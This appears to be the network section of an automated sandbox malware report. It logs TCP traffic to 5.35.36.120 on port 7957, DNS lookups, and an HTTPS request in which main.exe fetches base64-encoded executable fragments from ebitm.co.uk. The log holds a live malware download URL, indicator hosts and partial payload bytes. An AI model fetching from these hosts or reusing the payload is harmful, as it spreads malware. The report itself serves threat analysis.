Dec 19, 2024 09:30:02.024233103 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.024274111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.024328947 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.025311947 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.025330067 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.025393963 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.026204109 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.026220083 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.026263952 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.027199984 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.027370930 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.027422905 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.028240919 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.028276920 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.028327942 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.029320955 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.029339075 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.029391050 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.030448914 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.030466080 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.030520916 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.031363010 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.031379938 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.031425953 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.032390118 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.032454967 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.032502890 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.033324003 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.033416986 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.033695936 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.034593105 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.034610033 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.034872055 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.035387993 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.035537958 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.035584927 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.036420107 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.036438942 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.036484957 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.037470102 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.037611008 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.037656069 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.038882971 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.038898945 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.038959026 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.039513111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.039666891 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.039715052 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.040514946 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.040556908 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.041076899 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.041502953 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.041604996 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.041651964 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.042864084 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.042918921 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.042965889 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.043765068 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.043821096 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.043867111 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.044617891 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.044656992 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.044703007 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.045648098 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.045753956 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.045799017 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.046607018 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.046823978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.046869993 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.047667980 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.047729015 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.047775030 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.048654079 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.048765898 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.048810959 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.049643993 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.049812078 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.049858093 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.050796986 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.050837040 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.050883055 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.051723957 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.051804066 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.051848888 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.052994013 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.097213984 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.191874981 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.191899061 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.191915989 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.191935062 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.192002058 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.192025900 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.192924023 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.192946911 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.192996979 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.193638086 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.193695068 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.193742990 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.194439888 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.194679022 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.194725990 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.195554018 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.195647955 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.195698023 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.196552992 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.196666002 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.196711063 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.197494984 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.197658062 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.197709084 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.198591948 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.198741913 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.199136972 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.199548960 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.199942112 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.199995995 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.200797081 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.200813055 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.200853109 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.201699972 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.201813936 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.201860905 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.202753067 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.202776909 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.202831030 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.203726053 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.203771114 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.203816891 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.204695940 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.204802990 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.204849005 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.205694914 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.205919027 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.206228971 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.206748962 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.206978083 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.207024097 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.207838058 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.207853079 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.207915068 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.208748102 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.208816051 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.208863020 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.209752083 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.209979057 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.210027933 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.210803986 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.211047888 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.211100101 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.211544037 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.211594105 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:02.331533909 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:02.331551075 CET	7957	49811	5.35.36.120	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 09:29:21.151693106 CET	60785	53	192.168.2.5	1.1.1.1
Dec 19, 2024 09:29:21.289236069 CET	53	60785	1.1.1.1	192.168.2.5
Dec 19, 2024 09:29:33.841722012 CET	59564	53	192.168.2.5	1.1.1.1
Dec 19, 2024 09:29:33.979258060 CET	53	59564	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 09:29:21.151693106 CET	192.168.2.5	1.1.1.1	0x17f7	Standard query (0)	ebitm.co.uk	A (IP address)	IN (0x0001)	false
Dec 19, 2024 09:29:33.841722012 CET	192.168.2.5	1.1.1.1	0x261a	Standard query (0)	dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 09:29:21.289236069 CET	1.1.1.1	192.168.2.5	0x17f7	No error (0)	ebitm.co.uk		185.199.220.71	A (IP address)	IN (0x0001)	false
Dec 19, 2024 09:29:33.979258060 CET	1.1.1.1	192.168.2.5	0x261a	Name error (3)	dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ebitm.co.uk

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49726	185.199.220.71	443	384	C:\Users\user\Desktop\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 08:29:23 UTC	119	OUT	GET /salah/wp-includes/assets/ping.php HTTP/1.1 User-Agent: EXEFetcher Host: ebitm.co.uk Cache-Control: no-cache
2024-12-19 08:29:23 UTC	358	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain;charset=UTF-8 transfer-encoding: chunked date: Thu, 19 Dec 2024 08:29:23 GMT server: LiteSpeed vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-12-19 08:29:23 UTC	1010	IN	Data Raw: 31 30 30 30 30 0d 0a 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 42 65 39 46 72 42 52 71 2f 4f 41 55 61 76 7a 67 46 47 72 38 34 44 47 49 38 4f 41 59 61 76 7a 67 4d 59 69 77 34 46 42 71 2f 4f 41 55 61 76 6a 69 70 47 72 38 34 48 6f 63 56 4f 41 6b 61 76 7a 67 65 68 79 55 34 42 42 71 2f 4f 42 36 48 Data Ascii: 10000TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABBe9FrBRq/OAUavzgFGr84DGI8OAYavzgMYiw4FBq/OAUavjipGr84HocVOAkavzgehyU4BBq/OB6H
2024-12-19 08:29:24 UTC	14994	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 57 77 6b 45 49 4d 4e 6a 4f 74 48 41 50 2f 6f 61 78 34 41 41 47 6f 42 69 55 51 6b 48 4f 67 62 4a 67 41 41 36 49 6a 39 2f 2f 2f 2f 46 63 53 53 51 41 41 35 62 43 51 51 44 34 54 74 41 41 41 41 61 42 41 41 49 41 44 2f 64 43 51 55 36 4c 45 68 41 41 42 71 41 76 38 56 70 4a 42 41 41 47 67 49 6f 6b 41 41 55 2b 67 6a 4a 51 41 41 76 72 69 77 54 51 42 57 55 2f 38 56 47 4a 46 41 41 49 58 41 64 4c 6c 56 55 2f 38 56 68 4a 42 41 41 46 50 2f 46 58 69 51 51 41 42 6d 4f 53 32 6f 4d 45 30 41 64 51 74 57 61 4b 67 77 54 51 44 6f 30 79 51 41 41 50 39 30 4a 42 78 6f 41 50 42 48 41 4f 6a 46 4a 41 41 41 61 41 53 69 51 41 42 6f 43 44 42 49 41 4f 69 32 4a 41 41 41 61 68 70 66 76 6b 44 64 51 77 43 68 76 4f 70 48 41 50 2b 77 49 41 45 41 41 46 62 6f 6d 53 77 41 41 46 62 2f 46 58 43 52 Data Ascii: WwkEIMNjOtHAP/oax4AAGoBiUQkHOgbJgAA6Ij9////FcSSQAA5bCQQD4TtAAAAaBAAIAD/dCQU6LEhAABqAv8VpJBAAGgIokAAU+gjJQAAvriwTQBWU/8VGJFAAIXAdLlVU/8VhJBAAFP/FXiQQABmOS2oME0AdQtWaKgwTQDo0yQAAP90JBxoAPBHAOjFJAAAaASiQABoCDBIAOi2JAAAahpfvkDdQwChvOpHAP+wIAEAAFbomSwAAFb/FXCR
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 42 77 7a 37 62 34 41 42 41 41 41 4f 2f 31 30 4b 57 6f 42 56 56 66 6f 69 66 50 2f 2f 31 44 2f 46 62 79 51 51 41 42 57 55 31 66 2f 46 57 79 51 51 41 41 37 78 51 2b 45 67 77 45 41 41 44 76 47 44 34 39 37 41 51 41 41 56 72 39 34 74 45 59 41 56 2f 39 30 4a 43 44 2f 46 57 79 51 51 41 41 37 78 51 2b 45 59 67 45 41 41 44 76 47 44 34 39 61 41 51 41 41 56 56 56 57 61 43 42 6d 52 67 42 71 2f 31 4f 4c 48 55 69 52 51 41 42 56 56 66 2f 54 68 63 41 50 68 44 30 42 41 41 42 56 56 56 61 2b 63 47 78 47 41 46 5a 71 2f 31 64 56 56 66 2f 54 68 63 41 50 68 43 55 42 41 41 42 57 61 43 42 6d 52 67 42 6f 67 4b 68 41 41 47 68 77 63 45 59 41 2f 78 55 6f 6b 6b 41 41 67 38 51 51 69 39 69 68 76 4f 70 48 41 50 2b 77 4b 41 45 41 41 46 66 6f 6e 50 7a 2f 2f 32 6f 45 61 41 41 41 41 4d 42 58 Data Ascii: Bwz7b4ABAAAO/10KWoBVVfoifP//1D/FbyQQABWU1f/FWyQQAA7xQ+EgwEAADvGD497AQAAVr94tEYAV/90JCD/FWyQQAA7xQ+EYgEAADvGD49aAQAAVVVWaCBmRgBq/1OLHUiRQABVVf/ThcAPhD0BAABVVVa+cGxGAFZq/1dVVf/ThcAPhCUBAABWaCBmRgBogKhAAGhwcEYA/xUokkAAg8QQi9ihvOpHAP+wKAEAAFfonPz//2oEaAAAAMBX
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 46 51 41 58 77 42 44 41 45 38 41 54 67 42 47 41 45 6b 41 52 77 41 41 41 45 67 41 53 77 42 46 41 46 6b 41 58 77 42 51 41 45 55 41 55 67 42 47 41 45 38 41 55 67 42 4e 41 45 45 41 54 67 42 44 41 45 55 41 58 77 42 45 41 45 45 41 56 41 42 42 41 41 41 41 53 41 42 4c 41 45 55 41 57 51 42 66 41 46 55 41 55 77 42 46 41 46 49 41 55 77 41 41 41 41 41 41 53 41 42 4c 41 45 55 41 57 51 42 66 41 45 77 41 54 77 42 44 41 45 45 41 54 41 42 66 41 45 30 41 51 51 42 44 41 45 67 41 53 51 42 4f 41 45 55 41 41 41 41 41 41 45 67 41 53 77 42 46 41 46 6b 41 58 77 42 44 41 46 55 41 55 67 42 53 41 45 55 41 54 67 42 55 41 46 38 41 56 51 42 54 41 45 55 41 55 67 41 41 41 45 67 41 53 77 42 46 41 46 6b 41 58 77 42 44 41 45 77 41 51 51 42 54 41 46 4d 41 52 51 42 54 41 46 38 41 55 67 42 50 Data Ascii: FQAXwBDAE8ATgBGAEkARwAAAEgASwBFAFkAXwBQAEUAUgBGAE8AUgBNAEEATgBDAEUAXwBEAEEAVABBAAAASABLAEUAWQBfAFUAUwBFAFIAUwAAAAAASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAAAAAAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgAAAEgASwBFAFkAXwBDAEwAQQBTAFMARQBTAF8AUgBP
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 56 69 4c 33 73 5a 48 36 4b 6d 39 68 38 37 79 71 32 69 39 66 51 47 4e 56 38 36 67 2f 76 79 6e 36 44 2f 2f 4a 32 6a 2f 34 48 39 43 79 77 66 2f 69 6c 7a 68 62 5a 4b 2f 4b 39 49 30 38 5a 53 6c 6e 7a 56 65 79 33 6f 35 51 6d 6d 6c 77 31 62 61 77 4b 77 51 7a 52 58 57 32 59 79 52 30 47 72 46 34 32 6b 42 6c 54 59 63 46 46 78 34 50 4f 50 42 49 64 46 43 32 4e 47 73 56 7a 72 75 35 65 79 45 58 44 50 66 49 39 59 49 6a 47 4d 35 6f 6e 39 46 79 45 49 36 4c 50 68 48 4d 4f 31 53 4d 6b 75 5a 6b 64 5a 2b 5a 71 36 63 54 48 30 41 65 55 73 66 73 6f 54 6a 69 56 48 43 73 72 59 4a 69 5a 46 4b 54 4a 6e 61 6b 61 64 63 54 4f 6e 6f 55 44 36 66 70 6f 55 48 61 2b 48 72 66 34 69 51 6d 4e 77 61 49 75 6b 62 45 62 4f 53 4c 5a 53 57 66 4a 30 77 51 7a 73 79 34 31 30 53 49 6b 78 61 65 79 51 30 Data Ascii: ViL3sZH6Km9h87yq2i9fQGNV86g/vyn6D//J2j/4H9Cywf/ilzhbZK/K9I08ZSlnzVey3o5Qmmlw1bawKwQzRXW2YyR0GrF42kBlTYcFFx4POPBIdFC2NGsVzru5eyEXDPfI9YIjGM5on9FyEI6LPhHMO1SMkuZkdZ+Zq6cTH0AeUsfsoTjiVHCsrYJiZFKTJnakadcTOnoUD6fpoUHa+Hrf4iQmNwaIukbEbOSLZSWfJ0wQzsy410SIkxaeyQ0
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 65 53 79 79 74 68 38 78 2b 35 38 39 33 73 45 52 65 63 47 54 33 52 55 69 57 67 37 54 47 61 4a 41 50 6f 72 56 78 55 6c 73 4c 45 31 6a 65 37 58 49 31 37 31 61 42 66 53 74 62 2f 37 38 4d 6b 50 30 43 77 51 76 79 4f 64 7a 4c 41 6c 4a 52 4c 77 68 47 49 31 6d 44 4f 6b 30 47 42 67 5a 77 4c 43 79 47 7a 5a 4e 50 79 4c 61 50 73 51 4d 41 2f 44 7a 4b 4e 71 78 50 56 57 33 45 48 63 62 38 4f 78 67 44 54 2f 39 2f 4c 46 45 70 6e 77 4d 47 50 74 67 43 79 59 64 77 31 68 4a 4f 71 45 68 6f 52 52 74 33 38 70 72 46 39 42 77 34 77 77 61 62 7a 49 49 52 4a 66 76 78 6b 64 6f 4c 7a 32 50 6b 64 59 79 31 76 46 4f 61 62 4e 48 68 49 34 31 39 48 64 44 32 64 5a 4b 78 37 4c 32 56 39 65 69 34 31 45 46 57 6c 6b 47 5a 49 39 75 55 6a 6d 30 49 7a 61 6d 4a 6b 4a 6f 6f 4f 37 71 51 6d 74 35 42 64 72 Data Ascii: eSyyth8x+5893sERecGT3RUiWg7TGaJAPorVxUlsLE1je7XI171aBfStb/78MkP0CwQvyOdzLAlJRLwhGI1mDOk0GBgZwLCyGzZNPyLaPsQMA/DzKNqxPVW3EHcb8OxgDT/9/LFEpnwMGPtgCyYdw1hJOqEhoRRt38prF9Bw4wwabzIIRJfvxkdoLz2PkdYy1vFOabNHhI419HdD2dZKx7L2V9ei41EFWlkGZI9uUjm0IzamJkJooO7qQmt5Bdr
2024-12-19 08:29:24 UTC	16384	IN	Data Raw: 30 4a 65 62 72 50 39 65 62 59 6e 2f 5a 58 6d 59 2f 34 43 59 75 66 2b 56 72 73 7a 2f 71 4d 48 62 2f 36 57 37 30 76 2b 61 72 73 48 70 68 5a 65 6f 30 6e 75 4d 6e 63 78 77 67 4a 4c 51 5a 6e 65 4b 31 46 39 73 66 62 31 4e 55 32 43 52 4d 44 4d 38 59 43 63 71 4c 6b 59 4b 43 67 6f 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 51 49 56 46 68 6b 67 66 6f 75 Data Ascii: 0JebrP9ebYn/ZXmY/4CYuf+Vrsz/qMHb/6W70v+arsHphZeo0nuMncxwgJLQZneK1F9sfb1NU2CRMDM8YCcqLkYKCgoRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQIVFhkgfou
